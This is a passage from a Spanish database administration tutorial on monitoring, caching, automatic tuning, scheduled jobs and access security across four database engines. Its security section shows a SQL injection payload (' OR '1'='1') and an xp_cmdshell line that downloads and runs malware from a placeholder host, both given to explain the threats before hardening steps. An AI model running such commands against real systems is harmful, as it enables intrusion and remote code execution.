La supervisión en tiempo real y los ajustes automáticos son fundamentales en los motores de bases de datos para identificar problemas de rendimiento y realizar tareas de mantenimiento de forma eficiente. Aquí se presentan algunas prácticas, herramientas y métodos para implementar estas estrategias.

En SQL Server se puede usar el *SQL Server Profiler* o se puede capturar eventos con *Extended Events*.

SQL Server Profiler:

SQL Server Profiler es una herramienta que captura eventos en tiempo real para analizar el rendimiento de consultas, transacciones y bloqueos. Para usarlo se deben seguir los siguientes pasos:

1. Abrir *SQL Server Management Studio* (SSMS).
2. Ir a Herramientas > *SQL Server Profiler*.
3. Configurar una nueva traza seleccionando eventos como:
 - a. *SQL:BatchCompleted*: Consultas completas.

- b. *RPC:Completed*: Procedimientos almacenados completados.
- c. *Deadlock Graph*: Bloqueos.

4. Iniciar la captura y analizar los resultados.

En el *SQL Server Management Studio*, estos los pasos, detallados anteriormente, por medio de la interfaz gráfica:

Selección de eventos a monitorear. En esta opción se pueden seleccionar qué eventos se quieren monitorear.

Una vez ejecutado el *SQL Server Profiler* en la siguiente ventana se comenzará a ver el resultado de cada instrucción realizada en la sesión.


```
ALTER EVENT SESSION MonitorHighCostQueries ON SERVER STATE = START;
```

Para ver los resultados se utilizaría:

```
SELECT * FROM sys.fn_xe_file_target_read_file(
'C:\ExtendedEvents\HighCostQueries*.xel', NULL, NULL, NULL
);
```

Con Oracle se puede utilizar un Informe AWR (*Automatic Workload Repository*) mediante *script*. AWR almacena métricas de rendimiento. Genera automáticamente informes sobre el rendimiento de la base de datos, incluyendo consultas costosas, esperas de I/O y bloqueos.

Para generar un informe AWR se puede realizar desde *SQL*Plus*:

```
@$ORACLE_HOME/rdbms/admin/awrrpt.sql
```

Con esto, se podrá seleccionar los *snapshots* que se desean analizar (inicio y fin), revisar los resultados de monitoreos como consultas SQL con mayor consumo de recursos, tiempos de espera y uso de CPU y estadísticas de I/O por *tablespace*.

Para la supervisión en MySQL se puede realizar con *Performance Schema* (Monitoreo de consultas y recursos internos):

```
SELECT * FROM performance_schema.events_statements_summary_by_digest
ORDER BY SUM_TIMER_WAIT DESC
LIMIT 10;
```

También se puede con *SHOW PROCESSLIST* (Consulta de procesos en ejecución)

Además de los anteriores, se puede usar el monitoreo con *MySQL Enterprise Monitor* o herramientas como *Percona Monitoring and Management (PMM)*.

En PostgreSQL se puede consultar con *pg_stat_statements* (Consulta de sentencias más costosas).

```
SELECT query, calls, total_time, mean_time
FROM pg_stat_statements
ORDER BY total_time DESC
LIMIT 10;
```

EXPLAIN ANALYZE (Análisis de ejecución de consultas):

```
EXPLAIN ANALYZE SELECT COUNT(*) FROM grandes_tablas;
```

Optimización de la Entrada/Salida (I/O)

La entrada/salida (I/O) es un componente crítico en el rendimiento de las bases de datos, ya que las operaciones de lectura y escritura en disco pueden ser un cuello de botella significativo. Optimizar estas operaciones es clave para bases de datos que manejan grandes volúmenes de datos o entornos con alta carga transaccional.

Algunas recomendaciones que se pueden aplicar son la distribución de datos en discos, uso de almacenamiento SSD, uso de caché, indexación y particionamiento, monitoreo y ajuste de operaciones de I/O.

Separar archivos de datos, índices y registros de transacciones en discos diferentes reduce la competencia por recursos de I/O y mejora el rendimiento.

En SQL Server: Usa *filegroups* para distribuir archivos en diferentes discos.

```
CREATE DATABASE MiBaseDeDatos
ON
PRIMARY (
    NAME = 'MiBaseDeDatos_Data',
    FILENAME = 'D:\Datos\MiBaseDeDatos_Data.mdf'
),
FILEGROUP Indices (
    NAME = 'MiBaseDeDatos_Indices',
    FILENAME = 'E:\Indices\MiBaseDeDatos_Indices.ndf'
)
LOG ON (
    NAME = 'MiBaseDeDatos_Log',
    FILENAME = 'F:\Logs\MiBaseDeDatos_Log.ldf'
);
```

En Oracle: Se usa *tablespaces* para organizar y separar datos:

```
CREATE TABLESPACE Datos
DATAFILE '/path_disk1/datos.dbf' SIZE 1G;

CREATE TABLESPACE Indices
DATAFILE '/path_disk2/indices.dbf' SIZE 500M;
```

En PostgreSQL se realiza muy similar a Oracle:

```
CREATE TABLESPACE datos LOCATION '/mnt/disk1/datos';
CREATE TABLESPACE indices LOCATION '/mnt/disk2/indices';
```

En MySQL se puede hacer la separación de archivos de datos en diferentes discos:

```
SET GLOBAL innodb_data_home_dir = '/mnt/disk1/';  
SET GLOBAL innodb_log_group_home_dir = '/mnt/disk2/';
```

Los discos en estado sólido (SSD) son mucho más rápidos que los discos tradicionales (HDD) para operaciones de lectura/escritura. Migrar los archivos de datos críticos a SSD puede reducir significativamente la latencia. Configurar los archivos de registro de transacciones y los índices en discos SSD ayudará a maximizar el rendimiento.

El uso de caché es una de las estrategias más efectivas para optimizar el rendimiento de bases de datos, ya que reduce la dependencia de las operaciones de entrada/salida (I/O) en disco. Al almacenar temporalmente datos en memoria, la caché permite que las consultas frecuentes o los datos utilizados regularmente sean accesibles más rápidamente, minimizando la latencia y mejorando la experiencia del usuario.

La caché es un área de memoria que almacena datos recientemente leídos o utilizados, como páginas de tablas, índices o resultados de consultas. Las operaciones realizadas en memoria son significativamente más rápidas que las realizadas en disco, por lo que la caché reduce los tiempos de respuesta.

Existen tres tipos de caché:

Buffer Cache: El *Buffer Cache* (también llamado *Buffer Pool* en SQL Server) es el área principal de memoria utilizada para almacenar bloques de datos recientemente accedidos o modificados. Este caché evita acceder al disco cada vez que se necesita leer o escribir datos. En SQL Server, el término técnico es *Buffer Pool*, que funciona como el área principal para almacenar páginas de datos e índices en memoria. En Oracle, el *Database Buffer Cache* es parte del *System Global Area* (SGA) y cumple una función similar, almacenando bloques de datos leídos desde los archivos físicos.

En SQL Server se puede ajustar su tamaño con *max server memory*. El tamaño se expresa en *megabytes*.

```
EXEC sp_configure 'max server memory', 2048;  
RECONFIGURE;
```

En Oracle se puede configurar ajustando el parámetro *DB_CACHE_SIZE*.

```
ALTER SYSTEM SET DB_CACHE_SIZE = 500M;
```

Query Cache: El *Query Cache* almacena los resultados de consultas ejecutadas con frecuencia para evitar recalcularlos. Este tipo de caché es diferente del *Buffer Cache*, ya que no almacena bloques de datos, sino resultados preprocesados. Oracle tiene un *Result Cache* que almacena los resultados de consultas seleccionadas. SQL Server no tiene un *Query Cache* explícito, pero reutiliza planes de ejecución almacenados (*Plan Cache*) para consultas similares, lo que tiene un efecto parecido.

En Oracle se puede incrementar el tamaño del *Result Cache* ajustando el parámetro *RESULT_CACHE_MAX_SIZE*.

```
ALTER SYSTEM SET RESULT_CACHE_MAX_SIZE = 64M;
```

Plan Cache: El *Plan Cache* almacena los planes de ejecución generados por el optimizador de consultas para consultas repetitivas. Este caché reduce el tiempo necesario para analizar y generar un plan cada vez que se ejecuta una consulta similar. SQL Server administra planes de ejecución en el *Plan Cache* para consultas dinámicas y procedimientos almacenados. En Oracle los planes de ejecución se almacenan en el *Shared Pool*, dentro de la SGA.

En SQL Server, el *Plan Cache* comparte memoria con el *Buffer Pool*, así que al aumentar *max server memory* también puede beneficiar al *Plan Cache*.

Una opción que se puede realizar en SQL Server es un *flushing Manual* (Limpieza). Si el *Plan Cache* está lleno de planes innecesarios, se puede limpiar para liberar espacio:

```
DBCC FREEPROCCACHE;
```

En Oracle se puede incrementar el tamaño del *Shared Pool*, que contiene el *Plan Cache*, ajustando el parámetro *SHARED_POOL_SIZE*.

```
ALTER SYSTEM SET SHARED_POOL_SIZE = 512M;
```

Buffer Pool Extension (SQL Server). El *Buffer Pool Extension* es un mecanismo exclusivo de SQL Server que permite extender el *Buffer Pool* a un dispositivo de

almacenamiento rápido, como un SSD. Esto es útil cuando la memoria RAM física no es suficiente para manejar grandes volúmenes de datos. El tamaño del *Buffer Pool Extension* debe ser suficiente para manejar la carga adicional sin sustituir bloques críticos:

```
ALTER SERVER CONFIGURATION
SET BUFFER POOL EXTENSION ON
(FILENAME = 'D:\BufferPoolExtension.bpe', SIZE = 20GB);
```

Un resumen de cuándo se recomienda utilizar cada uno de estos tipos de caché anteriores, se puede ver en la siguiente tabla comparativa:

Tipo de Caché	Qué Almacena	Dónde se Usa	Propósito
<i>Buffer Cache/Buffer Pool</i>	Bloques de datos e índices leídos del disco.	SQL Server, Oracle	Reducir el acceso a disco para datos recientes.
<i>Query Cache</i>	Resultados de consultas ejecutadas.	Solo Oracle	Evitar recalcular resultados frecuentes.
<i>Plan Cache</i>	Planes de ejecución de consultas.	SQL Server, Oracle	Reutilizar planes para consultas similares.
<i>Buffer Pool Extension</i>	Extensión del <i>Buffer Pool</i> en SSD.	Solo SQL Server	Aumentar la capacidad de caché más allá de la RAM.

Ajustes automáticos

Los ajustes automáticos optimizan el rendimiento de las bases de datos al adaptarse dinámicamente a las condiciones de carga y patrones de uso. Estas herramientas eliminan gran parte de la intervención manual, asegurando un funcionamiento eficiente

A continuación, se muestran algunas configuraciones que se pueden realizar en SQL Server para ajustes automáticos en las bases de datos.

Optimización de consultas

En SQL Server se puede activar la optimización automática de consultas con *Query Store*:

```
ALTER DATABASE MiBaseDeDatos
SET QUERY_STORE = ON;
```

```
ALTER DATABASE MiBaseDeDatos
SET QUERY_STORE (OPERATION_MODE = READ_WRITE);
```

```
ALTER DATABASE MiBaseDeDatos
SET QUERY_STORE (MAX_STORAGE_SIZE_MB = 1000);
```

```
ALTER DATABASE MiBaseDeDatos
SET QUERY_STORE (QUERY_CAPTURE_MODE = AUTO);
```

Identificación de consultas problemáticas. Ejemplo de consultas con duración mayor a un segundo:

```
SELECT q.query_id, q.query_text_id, p.avg_duration AS AvgDuration, qt.query_sql_text AS
QueryText
FROM sys.query_store_query q
JOIN sys.query_store_plan p ON q.query_id = p.query_id
JOIN sys.query_store_query_text qt ON q.query_text_id = qt.query_text_id
WHERE p.avg_duration > 1000000;
```

Forzar plan de ejecución eficiente:

```
EXEC sp_query_store_force_plan @query_id = 12345, @plan_id = 67890;
```

En Oracle, se puede activar la optimización de consultas con AWR y *Automatic Memory Management (ADDM)*. Para generar informe AWR:

```
@$ORACLE_HOME/rdbms/admin/awrrpt.sql
```

Para consultar las consultas más costosas:

```
SELECT sql_id, executions, elapsed_time, sql_text
FROM dba_hist_sqlstat
ORDER BY elapsed_time DESC;
```

Ejecutar ADDM:

```

SET SERVEROUTPUT ON
BEGIN
  DBMS_ADVISOR.GET_TASK_REPORT(
    task_name => 'ADDM_TASK',
    type => 'TEXT',
    level => 'ALL'
  );
END;
/

```

En MySQL se puede activar el *Query Cache* (para versiones anteriores a MySQL 8.0)

```
SET GLOBAL query_cache_size = 64M;
```

Habilitar *Performance Schema* para monitoreo de consultas:

```

UPDATE performance_schema.setup_instruments
SET ENABLED = 'YES', TIMED = 'YES'
WHERE NAME LIKE 'statement/sql/%';

```

En PostgreSQL se puede activar *pg_stat_statements* para analizar consultas costosas:

```

CREATE EXTENSION IF NOT EXISTS pg_stat_statements;
ALTER SYSTEM SET track_activity_query_size = 2048;

```

Consultar las consultas con mayor costo:

```

SELECT query, calls, total_time
FROM pg_stat_statements
ORDER BY total_time DESC
LIMIT 10;

```

Ajuste automático de índices

En SQL Server se debe habilitar *Automatic Index Tuning*:

```

ALTER DATABASE MiBaseDeDatos
SET AUTOMATIC_TUNING (CREATE_INDEX = ON, DROP_INDEX = ON);

```

Para revisar las recomendaciones automáticas:

```

SELECT reason, state_desc, details
FROM sys.dm_db_tuning_recommendations;

```

En Oracle se puede usar el Oracle *Index Advisor*:

```

SELECT *
FROM dba_advisor_recommendations
WHERE task_name LIKE 'INDEX%';

```

Para aplicar recomendaciones de índices:

```
EXEC DBMS_ADVISOR.EXECUTE_TASK(task_name => 'INDEX_ADVISOR_TASK');
```

Ajuste automático de índices en MySQL. *Activar InnoDB Adaptive Hash Index:*

```
SET GLOBAL innodb_adaptive_hash_index = 1;
```

Ajuste automático de índices en PostgreSQL con el uso de *pg_stat_user_indexes* para detectar índices no utilizados:

```
SELECT relname, indexrelname, idx_scan
FROM pg_stat_user_indexes
WHERE idx_scan = 0;
```

Gestión Automática de Memoria

En SQL Server se puede configurar límites de memoria por medio del procedimiento *sp_configure*:

En el siguiente ejemplo, el mínimo es de 1024 *megabytes* y 8192 como máximo.

```
EXEC sp_configure 'min server memory', 1024;
EXEC sp_configure 'max server memory', 8192;
RECONFIGURE;
```

En Oracle se puede configurar el *Automatic Memory Management* (AMM):

```
ALTER SYSTEM SET MEMORY_TARGET = 2G;
ALTER SYSTEM SET MEMORY_MAX_TARGET = 4G;
```

En MySQL se puede realizar de la siguiente manera:

```
SET GLOBAL innodb_buffer_pool_size = 1G;
```

En PostgreSQL:

```
ALTER SYSTEM SET work_mem = '64MB';
```

Programación de tareas automáticas

La programación de tareas automáticas permite ejecutar rutinas de mantenimiento, análisis, optimización y tareas recurrentes en bases de datos, sin intervención manual. Tanto SQL Server como Oracle ofrecen herramientas específicas para programar y gestionar estas tareas.

Como se ha mencionado anteriormente, en SQL Server se puede usar el Agente de SQL Server. El siguiente ejemplo realizará una reconstrucción de índices semanalmente. Este ejemplo crea un trabajo que reconstruye índices en una tabla cada domingo a las 2:00 AM.

Se crea el trabajo:

```
EXEC sp_add_job
    @job_name = 'Rebuild Indexes Weekly';
```

Se agrega un paso al trabajo:

```
EXEC sp_add_jobstep
    @job_name = 'Rebuild Indexes Weekly',
    @step_name = 'Rebuild All Indexes',
    @subsystem = 'TSQL',
    @command = 'ALTER INDEX ALL ON [dbo].[MiTabla] REBUILD;',
    @on_success_action = 1;
```

Se crea un horario semanal:

```
EXEC sp_add_schedule
    @schedule_name = 'Weekly Schedule',
    @freq_type = 4,
    @freq_interval = 1,
    @active_start_time = 020000;
```

Se vincula el trabajo al horario:

```
EXEC sp_attach_schedule
    @job_name = 'Rebuild Indexes Weekly',
    @schedule_name = 'Weekly Schedule';
```

Se agrega el trabajo al servidor:

```
EXEC sp_add_jobserver
    @job_name = 'Rebuild Indexes Weekly';
```

Oracle ofrece el paquete *DBMS_SCHEDULER* para crear y programar tareas automáticas. Este es un sistema robusto que permite definir tareas, configurarlas con horarios flexibles y gestionar su ejecución.

El siguiente ejemplo es para realizar una actualización de estadísticas semanalmente. Este ejemplo programa una tarea para actualizar estadísticas de la base de datos cada domingo a las 3:00 AM.

```
BEGIN
  DBMS_SCHEDULER.CREATE_JOB (
    job_name      => 'Update_Stats',
    job_type      => 'PLSQL_BLOCK',
    job_action    => 'BEGIN DBMS_STATS.GATHER_DATABASE_STATS; END;',
    start_date    => SYSTIMESTAMP,
    repeat_interval => 'FREQ=WEEKLY; BYDAY=SUN; BYHOUR=3',
    enabled       => TRUE
  );
END;
/
```

En MySQL se puede realizar por medio de eventos:

```
CREATE EVENT OptimizarIndices
ON SCHEDULE EVERY 1 WEEK
DO
OPTIMIZE TABLE mi_tabla;
```

En PostgreSQL se puede hacer con el uso de *cron*:

```
SELECT cron.schedule('0 3 * * 0', $$VACUUM ANALYZE$$);
```

Acceso seguro a bases de datos

La seguridad en bases de datos se basa en proteger la confidencialidad, integridad y disponibilidad de la información almacenada. Las amenazas comunes incluyen inyección SQL, accesos no autorizados y *malware*. Implementar prácticas de control, monitoreo, encriptación, respaldo y gestión de accesos garantiza la integridad, confidencialidad y disponibilidad de los datos. Para mitigar estos riesgos, se deben implementar controles técnicos y organizacionales.

A continuación, se desarrolla cada punto con mayor detalle e incluye ejemplos prácticos de *scripts* en SQL Server, Oracle, MySQL y PostgreSQL para implementar las mejores prácticas.

Control de acceso y autenticación

Proteger el acceso a la base de datos es el primer paso para asegurarla. Esto implica autenticar usuarios de manera segura y asignarles los permisos mínimos necesarios. Además, se deben crear un mínimo de políticas que ayuden a cumplir con los objetivos de seguridad de la organización.

Políticas

Algunas de las políticas que pueden ser parte de los requerimientos mínimos para la seguridad de acceso en la base de datos pueden ser:

- Usar contraseñas fuertes que incluyan caracteres especiales, mayúsculas, minúsculas y números.
- Exigir cambios periódicos de contraseñas (60-90 días).
- Bloquear cuentas tras varios intentos fallidos.
- Asignar privilegios mínimos necesarios.

En SQL Server se puede implementar de la siguiente manera:

Crear un usuario con políticas de contraseña y configurar el número de intentos fallidos antes del bloqueo.

```
CREATE LOGIN usuario_seguro
WITH PASSWORD = 'ContraseñaFuerte123!',
MUST_CHANGE,
CHECK_EXPIRATION = ON,
CHECK_POLICY = ON;
```

Deshabilitar un login inactivo:

```
ALTER LOGIN usuario_inactivo DISABLE;
```

En Oracle se puede implementar con los siguientes *scripts*:

Crear un perfil con políticas de contraseña:

```
CREATE PROFILE Secure_Profile LIMIT
PASSWORD_LIFE_TIME 90
FAILED_LOGIN_ATTEMPTS 3
PASSWORD_LOCK_TIME 1;
```

Asignar perfil a usuario:

```
ALTER USER usuario_seguro PROFILE Secure_Profile;
```

En MySQL se puede de la siguiente manera:

Crear un usuario con políticas de contraseña seguras:

```
CREATE USER 'usuario_seguro'@'%' IDENTIFIED BY 'ContraseñaFuerte123!';
ALTER USER 'usuario_seguro'@'%' PASSWORD EXPIRE INTERVAL 90 DAY;
```

Restringir intentos fallidos de autenticación:

```
ALTER USER 'usuario_seguro'@'%' FAILED_LOGIN_ATTEMPTS 3
PASSWORD_LOCK_TIME 1;
```

Deshabilitar un usuario inactivo:

```
ALTER USER 'usuario_inactivo'@'%' ACCOUNT LOCK;
```

En PostgreSQL se pueden seguir las siguientes opciones:

Crear un usuario con políticas de contraseña seguras:

```
CREATE ROLE usuario_seguro WITH LOGIN PASSWORD 'ContraseñaFuerte123!';
```

```
ALTER ROLE usuario_seguro VALID UNTIL '2024-12-31';
```

Restringir intentos fallidos de autenticación:

```
ALTER ROLE usuario_seguro CONNECTION LIMIT 3;
```

Restricción de acceso por horario

Para las políticas de acceso se pueden considerar opciones como horarios o restricciones de IP. Esto ayuda a reducir el riesgo de accesos no autorizados fuera del horario laboral y a identificar actividades sospechosas en horarios no habituales.

SQL Server no ofrece una funcionalidad nativa para restringir acceso por horarios. Se puede lograr indirectamente mediante herramientas externas como *scripts* de *PowerShell* o utilizando *SQL Server Agent* para habilitar/deshabilitar *logins*.

Con el siguiente *script* se puede deshabilitar *login* fuera del horario laboral (6 pm).

```
EXEC sp_add_job @job_name = 'DisableLoginAfterHours';

EXEC sp_add_jobstep @job_name = 'DisableLoginAfterHours',
    @step_name = 'Disable Login',
    @command = 'ALTER LOGIN usuario_seguro DISABLE;',
    @subsystem = 'TSQL';

EXEC sp_add_schedule @schedule_name = 'AfterHours',
    @freq_type = 4,
    @freq_interval = 64,
    @active_start_time = 180000;

EXEC sp_attach_schedule @job_name = 'DisableLoginAfterHours', @schedule_name =
'AfterHours';
```

Oracle permite programar *scripts* con el paquete *DBMS_SCHEDULER* para habilitar/deshabilitar accesos según horarios.

Permitir *login* en horario laboral:

```
BEGIN
  DBMS_SCHEDULER.CREATE_JOB (
    job_name      => 'Allow_Login_WorkHours',
    job_type      => 'PLSQL_BLOCK',
    job_action    => 'ALTER USER usuario_seguro ACCOUNT UNLOCK;',
    start_date    => SYSTIMESTAMP,
    repeat_interval => 'FREQ=DAILY; BYHOUR=8; BYMINUTE=0',
```

```

        enabled    => TRUE
    );
END;
/

```

Bloquear login fuera del horario laboral:

```

BEGIN
  DBMS_SCHEDULER.CREATE_JOB (
    job_name      => 'Block_Login_AfterHours',
    job_type      => 'PLSQL_BLOCK',
    job_action    => 'ALTER USER usuario_seguro ACCOUNT LOCK;',
    start_date    => SYSTIMESTAMP,
    repeat_interval => 'FREQ=DAILY; BYHOUR=18; BYMINUTE=0',
    enabled       => TRUE
  );
END;
/

```

MySQL no ofrece una funcionalidad nativa para restringir acceso por horario, pero se puede lograr mediante eventos SQL programados.

Bloquear usuario fuera del horario laboral:

```

CREATE EVENT bloquear_usuario
ON SCHEDULE EVERY 1 DAY STARTS '18:00:00'
DO ALTER USER 'usuario_seguro'@%' ACCOUNT LOCK;

```

Habilitar usuario en horario laboral:

```

CREATE EVENT habilitar_usuario
ON SCHEDULE EVERY 1 DAY STARTS '08:00:00'
DO ALTER USER 'usuario_seguro'@%' ACCOUNT UNLOCK;

```

PostgreSQL permite restringir accesos mediante reglas de conexión en `pg_hba.conf` o mediante una función `PL/pgSQL` que se ejecuta en cada intento de conexión.

Crear una función para verificar horario de acceso:

```

CREATE OR REPLACE FUNCTION verificar_horario()
RETURNS EVENT_TRIGGER AS $$
BEGIN
  IF EXTRACT(HOUR FROM NOW()) < 8 OR EXTRACT(HOUR FROM NOW()) > 18
  THEN
    RAISE EXCEPTION 'Acceso no permitido fuera del horario laboral';
  END IF;
END;
$$ LANGUAGE plpgsql;

```

Asociar la función a los intentos de conexión:

```
CREATE EVENT TRIGGER bloquear_fuera_de_horario
ON LOGIN EXECUTE FUNCTION verificar_horario();
```

Restricción de acceso por IP

La restricción de IP tiene como objetivo limitar el acceso a la base de datos desde direcciones IP autorizadas. Esto reduce el riesgo de ataques externos y asegura que solo usuarios desde ubicaciones conocidas puedan acceder. Para implementar este tipo de políticas se debe establecer IP fijas para las personas que deban tener acceso a la base de datos o se debe gestionar dinámicamente cambios en las direcciones IP permitidas.

En SQL Server se puede configurar reglas de *firewall* para limitar accesos por IP:

```
EXEC sp_set_firewall_rule @name = 'Allow_IP_Only',
    @start_ip_address = '192.168.1.10',
    @end_ip_address = '192.168.1.10';
```

En Oracle, se puede usar la vista *DBA_NETWORK_ACL_PRIVILEGES* para definir restricciones de acceso por red:

```
BEGIN
  DBMS_NETWORK_ACL_ADMIN.CREATE_ACL(
    acl => 'db_access.xml',
    description => 'Restricción por IP',
    principal => 'USUARIO_SEGURIDAD',
    is_grant => TRUE,
    privilege => 'connect'
  );

  DBMS_NETWORK_ACL_ADMIN.ASSIGN_ACL(
    acl => 'db_access.xml',
    host => '192.168.1.10'
  );
END;
/
```

En MySQL se puede utilizar *mysqld.cnf*:

```
bind-address = 192.168.1.10
```

También se puede restringir a usuario en específico:

```
CREATE USER 'usuario_seguro'@'192.168.1.10' IDENTIFIED BY 'ContraseñaFuerte123!';
```

En PostgreSQL se puede configurar restricciones en *pg_hba.conf*:

```
host all usuario_seguro 192.168.1.10/32 scram-sha-256
```

Recargar la configuración:

```
systemctl restart postgresql
```

Autenticación Multifactor (MFA)

Configurar MFA ayuda a prevenir accesos no autorizados, combinando algo que el usuario sabe (contraseña) con algo que tiene (código de un dispositivo).

Primero se crea un rol con permisos mínimos y asignarlo a un usuario. Luego se crea el usuario y se asigna el rol.

En SQL Server se puede configurar de la siguiente manera:

```
CREATE ROLE db_reader_writer;
GRANT SELECT, INSERT, UPDATE, DELETE ON SCHEMA:::dbo TO db_reader_writer;

CREATE LOGIN usuario_limited WITH PASSWORD = 'ContraseñaFuerte123!';
CREATE USER usuario_limited FOR LOGIN usuario_limited;
ALTER ROLE db_reader_writer ADD MEMBER usuario_limited;
```

En Oracle:

```
CREATE ROLE reader_writer_role;
GRANT SELECT, INSERT, UPDATE, DELETE ON hr.employees TO reader_writer_role;

CREATE USER usuario_limited IDENTIFIED BY "ContraseñaFuerte123!";
GRANT reader_writer_role TO usuario_limited;
```

En MySQL:

```
CREATE ROLE db_reader_writer;
GRANT SELECT, INSERT, UPDATE, DELETE ON mydatabase.* TO db_reader_writer;

CREATE USER 'usuario_limited'@'%' IDENTIFIED BY 'ContraseñaFuerte123!';
GRANT db_reader_writer TO 'usuario_limited'@'%';
```

En PostgreSQL

```
CREATE ROLE reader_writer_role;
GRANT SELECT, INSERT, UPDATE, DELETE ON public.mi_tabla TO reader_writer_role;

CREATE USER usuario_limited WITH PASSWORD 'ContraseñaFuerte123!';
```

```
GRANT reader_writer_role TO usuario_limited;
```

Políticas de monitoreo y auditoría

El monitoreo y auditoría constante permiten detectar accesos sospechosos y anomalías. La finalidad de estas opciones es registrar intentos fallidos de acceso y modificaciones críticas. Además, generar alertas automáticas para eventos críticos.

En SQL Server se puede implementar de la siguiente manera:

Configurar auditoría de accesos fallidos:

```
CREATE SERVER AUDIT ServerAudit_Logins
TO FILE (FILEPATH = 'C:\Audits\', MAXSIZE = 10 MB);
ALTER SERVER AUDIT ServerAudit_Logins WITH (STATE = ON);
```

```
CREATE SERVER AUDIT SPECIFICATION Audit_LoginFailures
FOR SERVER AUDIT ServerAudit_Logins
ADD (FAILED_LOGIN_GROUP);
ALTER SERVER AUDIT SPECIFICATION Audit_LoginFailures WITH (STATE = ON);
```

En Oracle, la auditoría de accesos se configura de la siguiente manera:

```
AUDIT SESSION;
AUDIT SELECT TABLE BY usuario_seguro;
```

Monitoreo y auditoría en MySQL

Habilitar el log de auditoría:

```
SET GLOBAL log_output = 'TABLE';
SET GLOBAL general_log = 'ON';
```

Consultar registros de auditoría:

```
SELECT * FROM mysql.general_log WHERE command_type = 'Connect';
```

Registrar accesos fallidos:

```
SELECT user, host, COUNT(*)
FROM mysql.general_log
WHERE argument LIKE '%Access denied%'
GROUP BY user, host;
```

Monitoreo y auditoría en PostgreSQL

Habilitar *log_connections* y *log_disconnections*:

```
ALTER SYSTEM SET log_connections = 'on';
ALTER SYSTEM SET log_disconnections = 'on';
```

Registrar intentos fallidos de acceso:

```
ALTER SYSTEM SET log_statement = 'mod';
```

Consultar eventos auditados:

```
SELECT * FROM pg_catalog.pg_stat_activity WHERE state = 'active';
```

Prevención de Ataques***SQL Injection***

Sin el uso de consultas parametrizadas, una aplicación puede construir dinámicamente cadenas SQL basadas en entradas del usuario. Este ataque permite ejecutar comandos maliciosos a través de entradas no validadas.

Un ejemplo de vulnerabilidad es la siguiente:

```
DECLARE @Username NVARCHAR(50) = 'admin';
DECLARE @Password NVARCHAR(50) = "' OR '1'='1";
DECLARE @Query NVARCHAR(MAX);

SET @Query = 'SELECT * FROM Users WHERE Username = "' + @Username + "' AND
Password = "' + @Password + "'";
EXEC(@Query);
```

El atacante podría inyectar la condición *OR '1'='1'*, que siempre evalúa como verdadera, y obtener acceso no autorizado a toda la base de datos.

Para poder hacerle frente se pueden seguir los siguientes pasos:

- Usar consultas parametrizadas y procedimientos almacenados.
- Validar entradas eliminando caracteres especiales (' , ' ; , ' -- ').
- Configurar políticas de acceso con privilegios mínimos.

Para el uso de consultas parametrizadas, en SQL Server se puede realizar de la siguiente manera:

```
CREATE PROCEDURE SecureLogin
@Username NVARCHAR(50),
@Password NVARCHAR(50)
AS
BEGIN
    SELECT * FROM Users WHERE Username = @Username AND Password =
@Password;
END;
```

En Oracle:

```
CREATE OR REPLACE PROCEDURE SecureLogin(p_Username IN VARCHAR2,
p_Password IN VARCHAR2)
IS
    v_user_count NUMBER;
BEGIN
    EXECUTE IMMEDIATE 'SELECT COUNT(*) FROM Users WHERE Username = :1 AND
Password = :2'
    INTO v_user_count
    USING p_Username, p_Password;
END;
/
```

En MySQL

```
CREATE PROCEDURE SecureLogin(IN p_Username VARCHAR(50), IN p_Password
VARCHAR(50))
BEGIN
    SELECT * FROM Users WHERE Username = p_Username AND Password =
p_Password;
END;

PREPARE stmt FROM 'SELECT * FROM Users WHERE Username = ? AND Password =
?';
SET @Username = 'usuario';
SET @Password = 'password123';
EXECUTE stmt USING @Username, @Password;
```

Consultas Parametrizadas en PostgreSQL

```
CREATE FUNCTION SecureLogin(p_Username TEXT, p_Password TEXT)
RETURNS TABLE(user_id INT, username TEXT) AS $$
BEGIN
    RETURN QUERY
    SELECT id, Username FROM Users WHERE Username = p_Username AND Password =
p_Password;
```

```

END;
$$ LANGUAGE plpgsql;

PREPARE login_stmt (TEXT, TEXT) AS
SELECT * FROM Users WHERE Username = $1 AND Password = $2;
EXECUTE login_stmt('usuario', 'password123');
```

La validación de entradas se puede realizar rechazando caracteres especiales como ', --, ;, y /*. También se podría usar una lista blanca para entradas permitidas. El siguiente ejemplo solo permite letras, números y espacios.

```

CREATE FUNCTION ValidateInput (@Input NVARCHAR(MAX))
RETURNS BIT
AS
BEGIN
    IF @Input LIKE '%[^a-zA-Z0-9 ]%'
        RETURN 0;
    RETURN 1;
END;
```

Malware

El *malware* en bases de datos es una amenaza grave que puede comprometer datos confidenciales, interrumpir operaciones y dar acceso a atacantes para ejecutar acciones maliciosas. El *malware* puede introducirse en una base de datos a través de procedimientos almacenados, *scripts* externos, cargas no verificadas o vulnerabilidades del sistema. Si funciones peligrosas como *xp_cmdshell* están habilitadas, un atacante puede ejecutar comandos del sistema operativo desde la base de datos.

El siguiente ejemplo demuestra una ejecución de *malware* con *xp_cmdshell* habilitado:

```
EXEC xp_cmdshell 'curl http://malicious-site.com/malware.exe -o C:\malware.exe && start C:\malware.exe';
```

Algunas funciones avanzadas en SQL Server, Oracle, MySQL y PostgreSQL pueden ser utilizadas para ejecutar comandos del sistema operativo o interactuar con recursos externos. Estas funciones deben ser deshabilitadas si no son necesarias.

En SQL Server se puede deshabilitar *xp_cmdshell* para evitar ejecución de comandos del sistema operativo:

```
EXEC sp_configure 'show advanced options', 1;
```

```
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
```

En Oracle se puede revocar acceso a paquetes peligrosos como *UTL_FILE*:

```
REVOKE EXECUTE ON UTL_FILE FROM PUBLIC;
```

En MySQL se puede deshabilitar la carga de archivos maliciosos, con *LOAD DATA LOCAL INFILE*:

```
SET GLOBAL local_infile = 0;
```

Además, se puede revocar acceso a funciones peligrosas:

```
REVOKE EXECUTE ON FUNCTION sys_eval FROM usuario;
```

En PostgreSQL se puede revocar acceso a la extensión *dblink* para evitar conexiones externas no autorizadas:

```
REVOKE USAGE ON SCHEMA dblink FROM PUBLIC;
```

Restringir acceso a redes externas con *pg_hba.conf*:

```
host all all 0.0.0.0/0 reject
```

Además de denegar el uso de comandos peligrosos, también se puede monitorear el intento de uso de estos comandos. El monitoreo en tiempo real permite detectar comportamientos sospechosos antes de que causen daños.

En SQL Server se puede utilizar *Extended Events* para monitorear los comandos peligrosos.:

```
CREATE EVENT SESSION MalwareDetection
ON SERVER
ADD EVENT sqlserver.rpc_starting
WHERE (object_name = 'xp_cmdshell')
